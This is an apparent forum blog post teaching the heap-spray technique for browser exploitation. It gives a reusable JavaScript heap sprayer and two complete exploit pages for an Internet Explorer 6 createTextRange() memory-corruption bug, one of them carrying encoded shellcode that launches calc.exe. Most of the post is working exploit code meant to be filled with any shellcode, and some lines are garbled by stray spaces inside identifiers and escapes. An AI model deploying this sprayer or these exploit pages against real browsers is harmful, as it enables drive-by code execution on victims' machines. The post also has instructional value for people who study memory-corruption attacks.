View RSS Feed

prashant_uniyal

Heap Spray --- Slipping CPU to our pocket--by "vinnu"

Rating: 2 votes, 1.50 average.
Heap Spray --- Slipping CPU to our pocket

Author : "vinnu"
Team : "Legion Of Xtremers" (LOXians)
Greetz : Prashant Uniyal, b0nd, D4rk357, skylined

Rootkit Information:

IDE: any text editor
Language : Javascript
Targets: Web browsers


As the name defines itself Heap Spray technique uses the spraying of heap memory
with injection vector.
Injection Vector: Nop sled + Shellcode

This kind of exploitation is useful in use-after-free, double-free or memory corruption
vulnerabilities. In such attacks the program tries to access an object instance's methods or poroperties in heap
memory after the instance has been freed, this may lead to the code execution.

A typical execution flow of a general heap spray exploit is as:


-------------------------
Allocate the object
& properties if necessary
-------------------------
|
|
|
_I_
-------------------------
Free the object
-------------------------
|
|
|
_I_
------------------------
Spray the heap
------------------------
|
|
|
_I_
-------------------------
Trigger the vulnerability
-------------------------



And in general we can seperate the heap spray exploits in two sections:

1. Heap Sprayer
2. Vulnerability Trigger


1. Heap Sprayer : A heap sprayer sprays the heap with the properly alligned code to be executed
upon triggering the vulnerability. In heap spray the memory is repeatedly allocated in the heap area
and then injection vector is placed in it untill whole heap gets filled up.

The ammount of spray depends upon the available memory for the program and the guessed position of the
block of memory in which the vulnerable instance of object gets placed in general.

In order to develop some efficient sprayers, we must know a little about the fundamentals of allocations.

When an object gets allocated in heap?

Consider following two allocation:

var a = "XXXXXXXXXXXXXXXXXXXXXxxxxx"
var b = new String("YYYYYYYYYYYYYYYY")


Well variable "a" will be allocated on stack whereas b will be allocated on heap.

also consider following assignments:


var c = a + a;
var d = a.substring(0,a.length-3);


c and d Will also be allocated in heap area.

Also take into note that whan a heap allocation occurs, the largest unused block gets deallocated first and then
the smaller chunk is allocated there. This also gives control of the heap allocations and its alignment to the attacker.

Now we should know a little about the data placement in heap area.

Consider a string "AAAA", it will be placed in memory as unicode string in following form:

00 41 00 41 00 41 00 41 00 00


This kind of data handling can destroy the shellcode in memory. therefore, shellcode should be placed in memory
in unicode form occupying 00 bytes also with precious shellcode bytes.

For examples consider 90 90 90 90 bytes to be placed in memory as nop sled. Then this nop sled can be allocated as:

var nopsled = unescape("\u9090\u9090");

Sameway the shellcode can be placed in memory.

So now we have basic idea of code allocation. Now let us proceed to develop a sprayer:

The heap spray is done in two stages.

First a very large instance of injection vector is prepared & allocated on heap area
and then it is sprayed all over heap to fill up all available memory for heap allocations.


Note: After a perfect heap spray, no further heap allocations can be done.




var shellcode = unescape('<place Shellcode here>'); // shellcode is assigned.
bigblock = unescape("%u0D0D%u0D0D"); // nop sled
headersize=20;shellcodesize = headersize + shellcode.length; //Proper length of shellcode in memory is calculated.
while(bigblock.length < shellcodesize) {
bigblock += bigblock; // The nopsled of a little big size than shellcode size is first prepared.
}
heapshell = bigblock.substring(0, shellcodesize); // Nopsled of proper calculated shellcode length on heap is allocated.
nopsled = bigblock.substring(0, bigblock.length - shellcodesize); // another chunk of nopsled - propershellcode size in memory is allocated on heap
while(nopsled.length + shellcodesize < 0x40000){ // Filling up 40000 words (word = 2bytes) for modern browsers. Lets name this line as "single chunk".
nopsled = nopsled + nopsled + heapshell; // A large single chunk at heap is being populated.
}


Above code properly adjusts the nop sled 0x0d0d0d0d and shellcode.
Now this large heap chunk contained in variable "nopsled" needs to be sprayed throughout the
heap along with shellcode suffixed to it as:


spray=new Array();var i=0;
for(i=0;i<1000;i++) {
spray[i]=nopsled+shellcode; // Nopsled + shellcode being sprayed throughout the heap area.
}



Above code will spray 1000 time the heap enough to bring down a 512 MB physical memory windows XP systems in modern
web browsers IE7 onwards.

In case of IE6 and below, u may need to adjust the "single chunk" size and spray size accordingly.

For examples in case of IE 6 single chunk can be made 86000 whereas spray size can be set to 200 or 400 as per vulnerabilities requirements.

Now we have an efficient heap sprayer:

<----------------------heap sprayer------------------------>
var shellcode=unescape('<place Shellcode here>');
bigblock=unescape("%u0D0D%u0D0D");
headersize=20;shellcodesize=headersize+shellcode.l ength;
while(bigblock.length<shellcodesize){bigblock+=big block;}
heapshell=bigblock.substring(0,shellcodesize);
nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
while(nopsled.length+shellcodesize<0x40000){nopsle d=nopsled+nopsled+heapshell}

spray=new Array();var i=0;
for(i=0;i<1000;i++){spray[i]=nopsled+shellcode;}
<--------------------heap sprayer end---------------------->




Now let us consider few real world vulnerabilities and develop the exploits with above heap sprayer.


1. IE 6 textranges(): The vulnerability lies in createTextRange() function associated with checkbox objects in html.


<html>
<body>
<input type="checkbox" id='checkid'>
<script type=text/javascript language=javascript>
a=document.getElementById('checkid');
b=a.createTextRange();
</script>
</body>
</html>




In order to exploit such a vulnerability, we just need to spray the heap right before triggering the vulnerability.
after hit and trials and adjustments of "single chunk" size and spray size, we got an efficient exploit :


<!----------------------textranges.htm---------------->
<html>
<body>
<script language=javascript>
/*----------------------heap sprayer------------------------*/
var shellcode=unescape('<place Shellcode here>');
bigblock=unescape("%u0D0D%u0D0D");
headersize=20;shellcodesize=headersize+shellcode.l ength;
while(bigblock.length<shellcodesize){bigblock+=big block;}
heapshell=bigblock.substring(0,shellcodesize);
nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
while(nopsled.length+shellcodesize<0x82000){nopsle d=nopsled+nopsled+heapshell}

spray=new Array();var i=0;
for(i=0;i<400;i++){spray[i]=nopsled+shellcode;}
/*--------------------heap sprayer end----------------------*/
</script>
<input type="checkbox" id='checkid'>
<script type=text/javascript language=javascript>
a=document.getElementById('checkid');
b=a.createTextRange();
</script>
</body>
</html>
<!--------------------textranges.htm end-------------->



with calc.exe execution shellcode


<!----------------------textranges.htm---------------->
<html>
<body>
<script language=javascript>
/*----------------------heap sprayer------------------------*/
var shellcode=unescape('%u9090%u9090%u9090%u9090%uceba %u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u 030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u75 9c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9 %u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%u dd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39 f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91 %u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u 68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61 dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d %uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u 44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf8 26%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709 %u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u 7ed6%ud357%ue537%u76df%u4148');
bigblock=unescape("%u0D0D%u0D0D");
headersize=20;shellcodesize=headersize+shellcode.l ength;
while(bigblock.length<shellcodesize){bigblock+=big block;}
heapshell=bigblock.substring(0,shellcodesize);
nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
while(nopsled.length+shellcodesize<0x86000){nopsle d=nopsled+nopsled+heapshell}

spray=new Array();var i=0;
for(i=0;i<800;i++){spray[i]=nopsled+shellcode;}
/*--------------------heap sprayer end----------------------*/
</script>
<input type="checkbox" id='checkid'>
<script type=text/javascript language=javascript>
a=document.getElementById('checkid');
b=a.createTextRange();
</script>
</body>
</html>
<!--------------------textranges.htm end-------------->
Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: